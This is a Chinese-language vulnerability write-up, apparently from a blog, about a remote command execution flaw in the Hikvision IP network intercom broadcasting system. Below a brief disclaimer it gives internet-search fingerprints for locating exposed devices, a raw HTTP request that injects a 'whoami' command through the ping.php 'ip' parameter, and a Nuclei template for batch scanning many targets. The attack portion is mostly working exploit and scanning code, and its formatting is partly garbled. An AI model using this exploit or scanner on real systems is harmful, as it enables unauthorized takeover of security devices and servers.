天马网络 网站建设,wordpress如何添加视频,wordpress kratos主题,做网站的标准流程免责声明#xff1a;
文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…免责声明
文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责
一漏洞描述
海康威视网络对讲广播系统是海康威视提供的安防解决方案的一部分用于管理和实现对讲和广播功能。该产品存在远程命令执行漏洞攻击者可通过此漏洞获取服务器权限。
二漏洞影响版本
IP网络对讲广播系统
三网络空间测绘查询
fofa icon_hash-1830859634 hunter web.icone854b2eaa9e4685a95d8052d5e3165bc
四漏洞复现 poc:
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 46
Accept: application/json, text/javascript, */*; q0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequestjsondata%5Btype%5D123jsondata%5Bip%5Dwhoami批量检测
id: Hikvision-network-intercom-broadcasting-system-RCEinfo:name: Hikvision-network-intercom-broadcasting-system-RCEauthor: 芝士土拨鼠severity: highrequests:- raw:- |-POST /php/ping.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Content-Length: 46Accept: application/json, text/javascript, */*; q0.01Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2Connection: closeContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestjsondata%5Btype%5D123jsondata%5Bip%5Dwhoamimatchers-condition: andmatchers:- type: wordpart: bodywords:- administrator- root- type: statusstatus:- 200